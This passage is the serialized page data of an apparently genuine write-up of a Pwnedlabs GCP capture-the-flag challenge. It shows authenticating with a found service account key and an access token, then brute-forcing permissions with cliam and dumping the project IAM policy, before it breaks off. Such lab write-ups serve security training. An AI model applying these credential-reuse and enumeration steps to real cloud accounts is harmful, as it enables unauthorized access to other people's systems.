[{"data":1,"prerenderedAt":52782},["ShallowReactive",2],{"writeups":3},[4,5246,11492,22447,25207,29228,35017,40191,43349,45388],{"_path":5,"_dir":6,"_draft":7,"_partial":7,"_locale":8,"title":9,"description":8,"head":10,"body":29,"_type":5240,"_id":5241,"_source":5242,"_file":5243,"_stem":5244,"_extension":5245},"/writeups/pwnedlabs-gcp-challenge","writeups",false,"","Pwnedlabs GCP Challenge",{"title":9,"description":11,"keywords":12,"slug":13,"image":14,"date":15,"meta":16},"This challenge was released as part of a presentation made for the launch of Pwnedlabs' GCRTP bootcamp.","cloud,GCP,Privesc","pwnedlabs-gcp-challenge","https://res.cloudinary.com/dmju5zuhr/image/upload/v1743721051/writeups/pwnedlabs.webp","2025-04-02",[17,18,19,20,22,24,25,27],{"og:image":14},{"og:title":9},{"og:description":11},{"og:type":21},"article",{"og:url":23},"https://owalid.com/pwnedlabs-gcp-challenge",{"description":11},{"title":26},"Pwnedlabs GCP Challenge writeup",{"keywords":28},"cloud,GCP,Privesc,writeups,pwnedlabs,ctf",{"type":30,"children":31,"toc":5232},"root",[32,39,46,63,69,74,80,87,94,99,113,155,160,197,203,216,228,233,238,268,285,360,369,401,422,446,452,457,471,587,592,598,603,608,626,631,855,860,1339,1344,1349,1372,1377,1382,1425,1554,1559,1773,1778,1783,1787,1799,1803,1808,1814,1828,1833,1854,1859,1864,1869,1905,2016,2020,2208,2213,2226,2230,2257,2261,2266,2270,2290,2296,2312,2317,2350,2362,2381,2386,2549,2554,2670,2675,2729,2754,2759,2792,2797,2860,2865,3006,3018,3629,3634,4364,4369,4607,4612,4618,4623,4628,4646,4680,4685,5086,5097,5168,5181,5221,5226],{"type":33,"tag":34,"props":35,"children":36},"element","h1",{"id":13},[37],{"type":38,"value":9},"text",{"type":33,"tag":40,"props":41,"children":43},"h2",{"id":42},"introduction",[44],{"type":38,"value":45},"Introduction",{"type":33,"tag":47,"props":48,"children":49},"p",{},[50,52,61],{"type":38,"value":51},"This challenge was released as part of a presentation made for the launch of 
",{"type":33,"tag":53,"props":54,"children":58},"a",{"href":55,"rel":56},"https://pwnedlabs.io/",[57],"nofollow",[59],{"type":38,"value":60},"Pwnedlabs",{"type":38,"value":62},"' GCRTP bootcamp, where the first person to solve the challenge would win a voucher for the bootcamp, and I was lucky enough to get first blood on this challenge.",{"type":33,"tag":40,"props":64,"children":66},{"id":65},"starting-point",[67],{"type":38,"value":68},"Starting Point",{"type":33,"tag":47,"props":70,"children":71},{},[72],{"type":38,"value":73},"We begin our challenge with a URL that redirects us to a Google Drive page containing a GCP key in JSON format.",{"type":33,"tag":75,"props":76,"children":79},"custom-image",{"imgSrc":77,":width":78},"https://res.cloudinary.com/dmju5zuhr/image/upload/v1743698095/writeups/pwnedlabs-gcp-challenge/first-key.webp","1000",[],{"type":33,"tag":81,"props":82,"children":84},"h3",{"id":83},"authentication-methods-for-the-gcloud-sdk",[85],{"type":38,"value":86},"Authentication methods for the gcloud SDK",{"type":33,"tag":88,"props":89,"children":91},"h4",{"id":90},"service-account-key",[92],{"type":38,"value":93},"Service Account Key",{"type":33,"tag":47,"props":95,"children":96},{},[97],{"type":38,"value":98},"This is a JSON file containing credentials for a service account as described in the previous image, it is commonly used in scripts, CI/CD deployments, servers, etc.",{"type":33,"tag":47,"props":100,"children":101},{},[102,104,111],{"type":38,"value":103},"To use the key, we can use the ",{"type":33,"tag":105,"props":106,"children":108},"code",{"className":107},[],[109],{"type":38,"value":110},"gcloud",{"type":38,"value":112}," command line tool to authenticate with the service account using the following command:",{"type":33,"tag":114,"props":115,"children":117},"code-card",{"lang":116},"bash",[118],{"type":33,"tag":119,"props":120,"children":123},"pre",{"className":121,"code":122,"language":116,"meta":8,"style":8},"language-bash shiki 
shiki-themes vitesse-dark","gcloud auth activate-service-account --key-file=key.json\n",[124],{"type":33,"tag":105,"props":125,"children":126},{"__ignoreMap":8},[127],{"type":33,"tag":128,"props":129,"children":132},"span",{"class":130,"line":131},"line",1,[133,138,144,149],{"type":33,"tag":128,"props":134,"children":136},{"style":135},"--shiki-default:#80A665",[137],{"type":38,"value":110},{"type":33,"tag":128,"props":139,"children":141},{"style":140},"--shiki-default:#C98A7D",[142],{"type":38,"value":143}," auth",{"type":33,"tag":128,"props":145,"children":146},{"style":140},[147],{"type":38,"value":148}," activate-service-account",{"type":33,"tag":128,"props":150,"children":152},{"style":151},"--shiki-default:#C99076",[153],{"type":38,"value":154}," --key-file=key.json\n",{"type":33,"tag":47,"props":156,"children":157},{},[158],{"type":38,"value":159},"After authenticating, we can set the project to the one associated with the service account using:",{"type":33,"tag":114,"props":161,"children":162},{"lang":116},[163],{"type":33,"tag":119,"props":164,"children":166},{"className":121,"code":165,"language":116,"meta":8,"style":8},"gcloud config set project gr-proj-4\n",[167],{"type":33,"tag":105,"props":168,"children":169},{"__ignoreMap":8},[170],{"type":33,"tag":128,"props":171,"children":172},{"class":130,"line":131},[173,177,182,187,192],{"type":33,"tag":128,"props":174,"children":175},{"style":135},[176],{"type":38,"value":110},{"type":33,"tag":128,"props":178,"children":179},{"style":140},[180],{"type":38,"value":181}," config",{"type":33,"tag":128,"props":183,"children":184},{"style":140},[185],{"type":38,"value":186}," set",{"type":33,"tag":128,"props":188,"children":189},{"style":140},[190],{"type":38,"value":191}," project",{"type":33,"tag":128,"props":193,"children":194},{"style":140},[195],{"type":38,"value":196}," gr-proj-4\n",{"type":33,"tag":88,"props":198,"children":200},{"id":199},"access-token",[201],{"type":38,"value":202},"Access 
Token",{"type":33,"tag":47,"props":204,"children":205},{},[206,208,214],{"type":38,"value":207},"An access token is a short-lived credential (generally valid for 1h) used to prove your identity to Google APIs. It has a specific format and will always start with ",{"type":33,"tag":105,"props":209,"children":211},{"className":210},[],[212],{"type":38,"value":213},"ya29.",{"type":38,"value":215},".",{"type":33,"tag":47,"props":217,"children":218},{},[219,221,227],{"type":38,"value":220},"It can be retrieved when connected to the SDK using the command: ",{"type":33,"tag":105,"props":222,"children":224},{"className":223},[],[225],{"type":38,"value":226},"gcloud auth print-access-token",{"type":38,"value":215},{"type":33,"tag":47,"props":229,"children":230},{},[231],{"type":38,"value":232},"Additionally, certain account compromise paths allow us, as a service account, to retrieve an access token for another service account. This will allow us to interact with the compromised account, as we will see later in the writeup.",{"type":33,"tag":47,"props":234,"children":235},{},[236],{"type":38,"value":237},"The access token can be used in two possible ways:",{"type":33,"tag":239,"props":240,"children":241},"ul",{},[242,256],{"type":33,"tag":243,"props":244,"children":245},"li",{},[246,248,254],{"type":38,"value":247},"By interacting directly with Google APIs by specifying it in an ",{"type":33,"tag":105,"props":249,"children":251},{"className":250},[],[252],{"type":38,"value":253},"Authorization: Bearer",{"type":38,"value":255}," header.",{"type":33,"tag":243,"props":257,"children":258},{},[259,261,266],{"type":38,"value":260},"Or to use it with the ",{"type":33,"tag":105,"props":262,"children":264},{"className":263},[],[265],{"type":38,"value":110},{"type":38,"value":267}," SDK, here are the steps to follow:",{"type":33,"tag":269,"props":270,"children":271},"ol",{},[272],{"type":33,"tag":243,"props":273,"children":274},{},[275,277,283],{"type":38,"value":276},"Set the access 
token in the environment variable ",{"type":33,"tag":105,"props":278,"children":280},{"className":279},[],[281],{"type":38,"value":282},"CLOUDSDK_AUTH_ACCESS_TOKEN",{"type":38,"value":284},":",{"type":33,"tag":114,"props":286,"children":287},{"lang":116},[288],{"type":33,"tag":119,"props":289,"children":291},{"className":121,"code":290,"language":116,"meta":8,"style":8},"export CLOUDSDK_AUTH_ACCESS_TOKEN=ya29.c.c0ASRK0Gbjv4[...SNIP...]irRX3JRyQrz1rS3xqVc8\n",[292],{"type":33,"tag":105,"props":293,"children":294},{"__ignoreMap":8},[295],{"type":33,"tag":128,"props":296,"children":297},{"class":130,"line":131},[298,304,310,316,321,326,331,335,340,345,350,355],{"type":33,"tag":128,"props":299,"children":301},{"style":300},"--shiki-default:#CB7676",[302],{"type":38,"value":303},"export",{"type":33,"tag":128,"props":305,"children":307},{"style":306},"--shiki-default:#BD976A",[308],{"type":38,"value":309}," CLOUDSDK_AUTH_ACCESS_TOKEN",{"type":33,"tag":128,"props":311,"children":313},{"style":312},"--shiki-default:#666666",[314],{"type":38,"value":315},"=",{"type":33,"tag":128,"props":317,"children":318},{"style":306},[319],{"type":38,"value":320},"ya29",{"type":33,"tag":128,"props":322,"children":324},{"style":323},"--shiki-default:#DBD7CAEE",[325],{"type":38,"value":215},{"type":33,"tag":128,"props":327,"children":328},{"style":306},[329],{"type":38,"value":330},"c",{"type":33,"tag":128,"props":332,"children":333},{"style":323},[334],{"type":38,"value":215},{"type":33,"tag":128,"props":336,"children":337},{"style":306},[338],{"type":38,"value":339},"c0ASRK0Gbjv4",{"type":33,"tag":128,"props":341,"children":342},{"style":312},[343],{"type":38,"value":344},"[",{"type":33,"tag":128,"props":346,"children":347},{"style":323},[348],{"type":38,"value":349},"...SNIP...",{"type":33,"tag":128,"props":351,"children":352},{"style":312},[353],{"type":38,"value":354},"]",{"type":33,"tag":128,"props":356,"children":357},{"style":306},[358],{"type":38,"value":359},"irRX3JRyQrz1rS3xqVc8\
n",{"type":33,"tag":269,"props":361,"children":363},{"start":362},2,[364],{"type":33,"tag":243,"props":365,"children":366},{},[367],{"type":38,"value":368},"Set the project to the one associated with the service account using:",{"type":33,"tag":114,"props":370,"children":371},{"lang":116},[372],{"type":33,"tag":119,"props":373,"children":374},{"className":121,"code":165,"language":116,"meta":8,"style":8},[375],{"type":33,"tag":105,"props":376,"children":377},{"__ignoreMap":8},[378],{"type":33,"tag":128,"props":379,"children":380},{"class":130,"line":131},[381,385,389,393,397],{"type":33,"tag":128,"props":382,"children":383},{"style":135},[384],{"type":38,"value":110},{"type":33,"tag":128,"props":386,"children":387},{"style":140},[388],{"type":38,"value":181},{"type":33,"tag":128,"props":390,"children":391},{"style":140},[392],{"type":38,"value":186},{"type":33,"tag":128,"props":394,"children":395},{"style":140},[396],{"type":38,"value":191},{"type":33,"tag":128,"props":398,"children":399},{"style":140},[400],{"type":38,"value":196},{"type":33,"tag":269,"props":402,"children":404},{"start":403},3,[405,417],{"type":33,"tag":243,"props":406,"children":407},{},[408,410,415],{"type":38,"value":409},"Use the ",{"type":33,"tag":105,"props":411,"children":413},{"className":412},[],[414],{"type":38,"value":110},{"type":38,"value":416}," command as usual, and it will automatically use the access token for authentication.",{"type":33,"tag":243,"props":418,"children":419},{},[420],{"type":38,"value":421},"To unset the access token, you can use the command:",{"type":33,"tag":114,"props":423,"children":424},{"lang":116},[425],{"type":33,"tag":119,"props":426,"children":428},{"className":121,"code":427,"language":116,"meta":8,"style":8},"unset 
CLOUDSDK_AUTH_ACCESS_TOKEN\n",[429],{"type":33,"tag":105,"props":430,"children":431},{"__ignoreMap":8},[432],{"type":33,"tag":128,"props":433,"children":434},{"class":130,"line":131},[435,441],{"type":33,"tag":128,"props":436,"children":438},{"style":437},"--shiki-default:#B8A965",[439],{"type":38,"value":440},"unset",{"type":33,"tag":128,"props":442,"children":443},{"style":140},[444],{"type":38,"value":445}," CLOUDSDK_AUTH_ACCESS_TOKEN\n",{"type":33,"tag":40,"props":447,"children":449},{"id":448},"enumeration",[450],{"type":38,"value":451},"Enumeration",{"type":33,"tag":47,"props":453,"children":454},{},[455],{"type":38,"value":456},"From here, we have no information, so we need to proceed with enumerating our service account. To start, we'll examine what our service account can do and subsequently how our service account can interact with other service accounts.",{"type":33,"tag":47,"props":458,"children":459},{},[460,462,469],{"type":38,"value":461},"With ",{"type":33,"tag":53,"props":463,"children":466},{"href":464,"rel":465},"https://github.com/securisec/cliam",[57],[467],{"type":38,"value":468},"cliam",{"type":38,"value":470}," it is possible to brute force the actions that our service account is capable of performing.",{"type":33,"tag":114,"props":472,"children":473},{"lang":116},[474],{"type":33,"tag":119,"props":475,"children":477},{"className":121,"code":476,"language":116,"meta":8,"style":8},"cliam gcp --service-account=key.json --project-id gr-proj-4 bruteforce\nApr 04 00:34:58 DBG ● project=gr-proj-4 region=us-central1 zone=us-central1-a\nApr 04 00:35:06 INF ● 
resourcemanager.projects=get-iam-policy\n",[478],{"type":33,"tag":105,"props":479,"children":480},{"__ignoreMap":8},[481,513,557],{"type":33,"tag":128,"props":482,"children":483},{"class":130,"line":131},[484,488,493,498,503,508],{"type":33,"tag":128,"props":485,"children":486},{"style":135},[487],{"type":38,"value":468},{"type":33,"tag":128,"props":489,"children":490},{"style":140},[491],{"type":38,"value":492}," gcp",{"type":33,"tag":128,"props":494,"children":495},{"style":151},[496],{"type":38,"value":497}," --service-account=key.json",{"type":33,"tag":128,"props":499,"children":500},{"style":151},[501],{"type":38,"value":502}," --project-id",{"type":33,"tag":128,"props":504,"children":505},{"style":140},[506],{"type":38,"value":507}," gr-proj-4",{"type":33,"tag":128,"props":509,"children":510},{"style":140},[511],{"type":38,"value":512}," bruteforce\n",{"type":33,"tag":128,"props":514,"children":515},{"class":130,"line":362},[516,521,527,532,537,542,547,552],{"type":33,"tag":128,"props":517,"children":518},{"style":135},[519],{"type":38,"value":520},"Apr",{"type":33,"tag":128,"props":522,"children":524},{"style":523},"--shiki-default:#4C9A91",[525],{"type":38,"value":526}," 04",{"type":33,"tag":128,"props":528,"children":529},{"style":140},[530],{"type":38,"value":531}," 00:34:58",{"type":33,"tag":128,"props":533,"children":534},{"style":140},[535],{"type":38,"value":536}," DBG",{"type":33,"tag":128,"props":538,"children":539},{"style":140},[540],{"type":38,"value":541}," ●",{"type":33,"tag":128,"props":543,"children":544},{"style":140},[545],{"type":38,"value":546}," project=gr-proj-4",{"type":33,"tag":128,"props":548,"children":549},{"style":140},[550],{"type":38,"value":551}," region=us-central1",{"type":33,"tag":128,"props":553,"children":554},{"style":140},[555],{"type":38,"value":556}," 
zone=us-central1-a\n",{"type":33,"tag":128,"props":558,"children":559},{"class":130,"line":403},[560,564,568,573,578,582],{"type":33,"tag":128,"props":561,"children":562},{"style":135},[563],{"type":38,"value":520},{"type":33,"tag":128,"props":565,"children":566},{"style":523},[567],{"type":38,"value":526},{"type":33,"tag":128,"props":569,"children":570},{"style":140},[571],{"type":38,"value":572}," 00:35:06",{"type":33,"tag":128,"props":574,"children":575},{"style":140},[576],{"type":38,"value":577}," INF",{"type":33,"tag":128,"props":579,"children":580},{"style":140},[581],{"type":38,"value":541},{"type":33,"tag":128,"props":583,"children":584},{"style":140},[585],{"type":38,"value":586}," resourcemanager.projects=get-iam-policy\n",{"type":33,"tag":47,"props":588,"children":589},{},[590],{"type":38,"value":591},"After our enumeration, we can see that our service account can read the project's IAM policy.",{"type":33,"tag":81,"props":593,"children":595},{"id":594},"how-iam-policies-work-on-gcp",[596],{"type":38,"value":597},"How do IAM policies work on GCP?",{"type":33,"tag":47,"props":599,"children":600},{},[601],{"type":38,"value":602},"In GCP, an IAM policy is a set of rules that defines who can do what on which resource. 
It controls access by assigning roles to members on specific resources.",{"type":33,"tag":47,"props":604,"children":605},{},[606],{"type":38,"value":607},"An IAM Policy consists of bindings that associate:",{"type":33,"tag":239,"props":609,"children":610},{},[611,616,621],{"type":33,"tag":243,"props":612,"children":613},{},[614],{"type":38,"value":615},"One or more members (users, groups, service accounts)",{"type":33,"tag":243,"props":617,"children":618},{},[619],{"type":38,"value":620},"A role (predefined or custom)",{"type":33,"tag":243,"props":622,"children":623},{},[624],{"type":38,"value":625},"A condition (optional, to restrict access based on criteria)",{"type":33,"tag":47,"props":627,"children":628},{},[629],{"type":38,"value":630},"Here is an example of an IAM Policy (JSON):",{"type":33,"tag":114,"props":632,"children":634},{"lang":633},"json",[635],{"type":33,"tag":119,"props":636,"children":639},{"className":637,"code":638,"language":633,"meta":8,"style":8},"language-json shiki shiki-themes vitesse-dark","{\n  \"role\": \"roles/storage.objectViewer\",\n  \"members\": [\"user:alice@example.com\"],\n  \"condition\": {\n    \"title\": \"TemporaryAccess\",\n    \"expression\": \"request.time \u003C timestamp('2025-01-01T00:00:00Z')\"\n  }\n}\n",[640],{"type":33,"tag":105,"props":641,"children":642},{"__ignoreMap":8},[643,651,694,737,763,802,837,846],{"type":33,"tag":128,"props":644,"children":645},{"class":130,"line":131},[646],{"type":33,"tag":128,"props":647,"children":648},{"style":312},[649],{"type":38,"value":650},"{\n",{"type":33,"tag":128,"props":652,"children":653},{"class":130,"line":362},[654,660,665,670,674,680,685,689],{"type":33,"tag":128,"props":655,"children":657},{"style":656},"--shiki-default:#B8A96577",[658],{"type":38,"value":659},"  
\"",{"type":33,"tag":128,"props":661,"children":662},{"style":437},[663],{"type":38,"value":664},"role",{"type":33,"tag":128,"props":666,"children":667},{"style":656},[668],{"type":38,"value":669},"\"",{"type":33,"tag":128,"props":671,"children":672},{"style":312},[673],{"type":38,"value":284},{"type":33,"tag":128,"props":675,"children":677},{"style":676},"--shiki-default:#C98A7D77",[678],{"type":38,"value":679}," \"",{"type":33,"tag":128,"props":681,"children":682},{"style":140},[683],{"type":38,"value":684},"roles/storage.objectViewer",{"type":33,"tag":128,"props":686,"children":687},{"style":676},[688],{"type":38,"value":669},{"type":33,"tag":128,"props":690,"children":691},{"style":312},[692],{"type":38,"value":693},",\n",{"type":33,"tag":128,"props":695,"children":696},{"class":130,"line":403},[697,701,706,710,714,719,723,728,732],{"type":33,"tag":128,"props":698,"children":699},{"style":656},[700],{"type":38,"value":659},{"type":33,"tag":128,"props":702,"children":703},{"style":437},[704],{"type":38,"value":705},"members",{"type":33,"tag":128,"props":707,"children":708},{"style":656},[709],{"type":38,"value":669},{"type":33,"tag":128,"props":711,"children":712},{"style":312},[713],{"type":38,"value":284},{"type":33,"tag":128,"props":715,"children":716},{"style":312},[717],{"type":38,"value":718}," 
[",{"type":33,"tag":128,"props":720,"children":721},{"style":676},[722],{"type":38,"value":669},{"type":33,"tag":128,"props":724,"children":725},{"style":140},[726],{"type":38,"value":727},"user:alice@example.com",{"type":33,"tag":128,"props":729,"children":730},{"style":676},[731],{"type":38,"value":669},{"type":33,"tag":128,"props":733,"children":734},{"style":312},[735],{"type":38,"value":736},"],\n",{"type":33,"tag":128,"props":738,"children":740},{"class":130,"line":739},4,[741,745,750,754,758],{"type":33,"tag":128,"props":742,"children":743},{"style":656},[744],{"type":38,"value":659},{"type":33,"tag":128,"props":746,"children":747},{"style":437},[748],{"type":38,"value":749},"condition",{"type":33,"tag":128,"props":751,"children":752},{"style":656},[753],{"type":38,"value":669},{"type":33,"tag":128,"props":755,"children":756},{"style":312},[757],{"type":38,"value":284},{"type":33,"tag":128,"props":759,"children":760},{"style":312},[761],{"type":38,"value":762}," {\n",{"type":33,"tag":128,"props":764,"children":766},{"class":130,"line":765},5,[767,772,777,781,785,789,794,798],{"type":33,"tag":128,"props":768,"children":769},{"style":656},[770],{"type":38,"value":771},"    
\"",{"type":33,"tag":128,"props":773,"children":774},{"style":437},[775],{"type":38,"value":776},"title",{"type":33,"tag":128,"props":778,"children":779},{"style":656},[780],{"type":38,"value":669},{"type":33,"tag":128,"props":782,"children":783},{"style":312},[784],{"type":38,"value":284},{"type":33,"tag":128,"props":786,"children":787},{"style":676},[788],{"type":38,"value":679},{"type":33,"tag":128,"props":790,"children":791},{"style":140},[792],{"type":38,"value":793},"TemporaryAccess",{"type":33,"tag":128,"props":795,"children":796},{"style":676},[797],{"type":38,"value":669},{"type":33,"tag":128,"props":799,"children":800},{"style":312},[801],{"type":38,"value":693},{"type":33,"tag":128,"props":803,"children":805},{"class":130,"line":804},6,[806,810,815,819,823,827,832],{"type":33,"tag":128,"props":807,"children":808},{"style":656},[809],{"type":38,"value":771},{"type":33,"tag":128,"props":811,"children":812},{"style":437},[813],{"type":38,"value":814},"expression",{"type":33,"tag":128,"props":816,"children":817},{"style":656},[818],{"type":38,"value":669},{"type":33,"tag":128,"props":820,"children":821},{"style":312},[822],{"type":38,"value":284},{"type":33,"tag":128,"props":824,"children":825},{"style":676},[826],{"type":38,"value":679},{"type":33,"tag":128,"props":828,"children":829},{"style":140},[830],{"type":38,"value":831},"request.time \u003C timestamp('2025-01-01T00:00:00Z')",{"type":33,"tag":128,"props":833,"children":834},{"style":676},[835],{"type":38,"value":836},"\"\n",{"type":33,"tag":128,"props":838,"children":840},{"class":130,"line":839},7,[841],{"type":33,"tag":128,"props":842,"children":843},{"style":312},[844],{"type":38,"value":845},"  }\n",{"type":33,"tag":128,"props":847,"children":849},{"class":130,"line":848},8,[850],{"type":33,"tag":128,"props":851,"children":852},{"style":312},[853],{"type":38,"value":854},"}\n",{"type":33,"tag":47,"props":856,"children":857},{},[858],{"type":38,"value":859},"Listing IAM policies allows us to gain 
more insights into the permissions and names of users or service accounts that could be used - this is important information for exploiting attack paths to another account.",{"type":33,"tag":114,"props":861,"children":862},{"lang":116},[863],{"type":33,"tag":119,"props":864,"children":866},{"className":121,"code":865,"language":116,"meta":8,"style":8},"gcloud projects get-iam-policy gr-proj-4\n\n- members:\n  - serviceAccount:payments@gr-proj-4.iam.gserviceaccount.com\n  role: projects/gr-proj-4/roles/PaymentsStorage\n- members:\n  - serviceAccount:staging@gr-proj-4.iam.gserviceaccount.com\n  role: projects/gr-proj-4/roles/Staging2\n- members:\n  - serviceAccount:analytics@gr-proj-4.iam.gserviceaccount.com\n  role: roles/analyticshub.viewer\n- members:\n  - serviceAccount:analytics@gr-proj-4.iam.gserviceaccount.com\n  role: roles/bigquery.dataViewer\n- members:\n  - serviceAccount:sql-424@gr-proj-4.iam.gserviceaccount.com\n  role: roles/cloudsql.viewer\n- members:\n  - serviceAccount:platform-middleware@gr-proj-4.iam.gserviceaccount.com\n  role: roles/compute.viewer\n- members:\n  - user:ian@pwnedlabs.io\n  role: roles/owner\n- members:\n  - serviceAccount:platform-middleware@gr-proj-4.iam.gserviceaccount.com\n  role: roles/run.invoker\n- members:\n  - serviceAccount:platform-middleware@gr-proj-4.iam.gserviceaccount.com\n  role: roles/secretmanager.viewer\n- members:\n  - serviceAccount:payments@gr-proj-4.iam.gserviceaccount.com\n  role: roles/storage.bucketViewer\n- members:\n  - serviceAccount:payments@gr-proj-4.iam.gserviceaccount.com\n  role: roles/storage.objectViewer\netag: BwYxzfQaKR4=\nversion: 
1\n",[867],{"type":33,"tag":105,"props":868,"children":869},{"__ignoreMap":8},[870,891,900,913,926,939,950,962,974,986,999,1012,1024,1036,1049,1061,1074,1087,1099,1112,1125,1137,1150,1163,1175,1187,1200,1212,1224,1237,1249,1261,1274,1286,1298,1311,1325],{"type":33,"tag":128,"props":871,"children":872},{"class":130,"line":131},[873,877,882,887],{"type":33,"tag":128,"props":874,"children":875},{"style":135},[876],{"type":38,"value":110},{"type":33,"tag":128,"props":878,"children":879},{"style":140},[880],{"type":38,"value":881}," projects",{"type":33,"tag":128,"props":883,"children":884},{"style":140},[885],{"type":38,"value":886}," get-iam-policy",{"type":33,"tag":128,"props":888,"children":889},{"style":140},[890],{"type":38,"value":196},{"type":33,"tag":128,"props":892,"children":893},{"class":130,"line":362},[894],{"type":33,"tag":128,"props":895,"children":897},{"emptyLinePlaceholder":896},true,[898],{"type":38,"value":899},"\n",{"type":33,"tag":128,"props":901,"children":902},{"class":130,"line":403},[903,908],{"type":33,"tag":128,"props":904,"children":905},{"style":135},[906],{"type":38,"value":907},"-",{"type":33,"tag":128,"props":909,"children":910},{"style":140},[911],{"type":38,"value":912}," members:\n",{"type":33,"tag":128,"props":914,"children":915},{"class":130,"line":739},[916,921],{"type":33,"tag":128,"props":917,"children":918},{"style":135},[919],{"type":38,"value":920},"  -",{"type":33,"tag":128,"props":922,"children":923},{"style":140},[924],{"type":38,"value":925}," serviceAccount:payments@gr-proj-4.iam.gserviceaccount.com\n",{"type":33,"tag":128,"props":927,"children":928},{"class":130,"line":765},[929,934],{"type":33,"tag":128,"props":930,"children":931},{"style":135},[932],{"type":38,"value":933},"  role:",{"type":33,"tag":128,"props":935,"children":936},{"style":140},[937],{"type":38,"value":938}," 
projects/gr-proj-4/roles/PaymentsStorage\n",{"type":33,"tag":128,"props":940,"children":941},{"class":130,"line":804},[942,946],{"type":33,"tag":128,"props":943,"children":944},{"style":135},[945],{"type":38,"value":907},{"type":33,"tag":128,"props":947,"children":948},{"style":140},[949],{"type":38,"value":912},{"type":33,"tag":128,"props":951,"children":952},{"class":130,"line":839},[953,957],{"type":33,"tag":128,"props":954,"children":955},{"style":135},[956],{"type":38,"value":920},{"type":33,"tag":128,"props":958,"children":959},{"style":140},[960],{"type":38,"value":961}," serviceAccount:staging@gr-proj-4.iam.gserviceaccount.com\n",{"type":33,"tag":128,"props":963,"children":964},{"class":130,"line":848},[965,969],{"type":33,"tag":128,"props":966,"children":967},{"style":135},[968],{"type":38,"value":933},{"type":33,"tag":128,"props":970,"children":971},{"style":140},[972],{"type":38,"value":973}," projects/gr-proj-4/roles/Staging2\n",{"type":33,"tag":128,"props":975,"children":977},{"class":130,"line":976},9,[978,982],{"type":33,"tag":128,"props":979,"children":980},{"style":135},[981],{"type":38,"value":907},{"type":33,"tag":128,"props":983,"children":984},{"style":140},[985],{"type":38,"value":912},{"type":33,"tag":128,"props":987,"children":989},{"class":130,"line":988},10,[990,994],{"type":33,"tag":128,"props":991,"children":992},{"style":135},[993],{"type":38,"value":920},{"type":33,"tag":128,"props":995,"children":996},{"style":140},[997],{"type":38,"value":998}," serviceAccount:analytics@gr-proj-4.iam.gserviceaccount.com\n",{"type":33,"tag":128,"props":1000,"children":1002},{"class":130,"line":1001},11,[1003,1007],{"type":33,"tag":128,"props":1004,"children":1005},{"style":135},[1006],{"type":38,"value":933},{"type":33,"tag":128,"props":1008,"children":1009},{"style":140},[1010],{"type":38,"value":1011}," 
roles/analyticshub.viewer\n",{"type":33,"tag":128,"props":1013,"children":1015},{"class":130,"line":1014},12,[1016,1020],{"type":33,"tag":128,"props":1017,"children":1018},{"style":135},[1019],{"type":38,"value":907},{"type":33,"tag":128,"props":1021,"children":1022},{"style":140},[1023],{"type":38,"value":912},{"type":33,"tag":128,"props":1025,"children":1027},{"class":130,"line":1026},13,[1028,1032],{"type":33,"tag":128,"props":1029,"children":1030},{"style":135},[1031],{"type":38,"value":920},{"type":33,"tag":128,"props":1033,"children":1034},{"style":140},[1035],{"type":38,"value":998},{"type":33,"tag":128,"props":1037,"children":1039},{"class":130,"line":1038},14,[1040,1044],{"type":33,"tag":128,"props":1041,"children":1042},{"style":135},[1043],{"type":38,"value":933},{"type":33,"tag":128,"props":1045,"children":1046},{"style":140},[1047],{"type":38,"value":1048}," roles/bigquery.dataViewer\n",{"type":33,"tag":128,"props":1050,"children":1052},{"class":130,"line":1051},15,[1053,1057],{"type":33,"tag":128,"props":1054,"children":1055},{"style":135},[1056],{"type":38,"value":907},{"type":33,"tag":128,"props":1058,"children":1059},{"style":140},[1060],{"type":38,"value":912},{"type":33,"tag":128,"props":1062,"children":1064},{"class":130,"line":1063},16,[1065,1069],{"type":33,"tag":128,"props":1066,"children":1067},{"style":135},[1068],{"type":38,"value":920},{"type":33,"tag":128,"props":1070,"children":1071},{"style":140},[1072],{"type":38,"value":1073}," serviceAccount:sql-424@gr-proj-4.iam.gserviceaccount.com\n",{"type":33,"tag":128,"props":1075,"children":1077},{"class":130,"line":1076},17,[1078,1082],{"type":33,"tag":128,"props":1079,"children":1080},{"style":135},[1081],{"type":38,"value":933},{"type":33,"tag":128,"props":1083,"children":1084},{"style":140},[1085],{"type":38,"value":1086}," 
roles/cloudsql.viewer\n",{"type":33,"tag":128,"props":1088,"children":1090},{"class":130,"line":1089},18,[1091,1095],{"type":33,"tag":128,"props":1092,"children":1093},{"style":135},[1094],{"type":38,"value":907},{"type":33,"tag":128,"props":1096,"children":1097},{"style":140},[1098],{"type":38,"value":912},{"type":33,"tag":128,"props":1100,"children":1102},{"class":130,"line":1101},19,[1103,1107],{"type":33,"tag":128,"props":1104,"children":1105},{"style":135},[1106],{"type":38,"value":920},{"type":33,"tag":128,"props":1108,"children":1109},{"style":140},[1110],{"type":38,"value":1111}," serviceAccount:platform-middleware@gr-proj-4.iam.gserviceaccount.com\n",{"type":33,"tag":128,"props":1113,"children":1115},{"class":130,"line":1114},20,[1116,1120],{"type":33,"tag":128,"props":1117,"children":1118},{"style":135},[1119],{"type":38,"value":933},{"type":33,"tag":128,"props":1121,"children":1122},{"style":140},[1123],{"type":38,"value":1124}," roles/compute.viewer\n",{"type":33,"tag":128,"props":1126,"children":1128},{"class":130,"line":1127},21,[1129,1133],{"type":33,"tag":128,"props":1130,"children":1131},{"style":135},[1132],{"type":38,"value":907},{"type":33,"tag":128,"props":1134,"children":1135},{"style":140},[1136],{"type":38,"value":912},{"type":33,"tag":128,"props":1138,"children":1140},{"class":130,"line":1139},22,[1141,1145],{"type":33,"tag":128,"props":1142,"children":1143},{"style":135},[1144],{"type":38,"value":920},{"type":33,"tag":128,"props":1146,"children":1147},{"style":140},[1148],{"type":38,"value":1149}," user:ian@pwnedlabs.io\n",{"type":33,"tag":128,"props":1151,"children":1153},{"class":130,"line":1152},23,[1154,1158],{"type":33,"tag":128,"props":1155,"children":1156},{"style":135},[1157],{"type":38,"value":933},{"type":33,"tag":128,"props":1159,"children":1160},{"style":140},[1161],{"type":38,"value":1162}," 
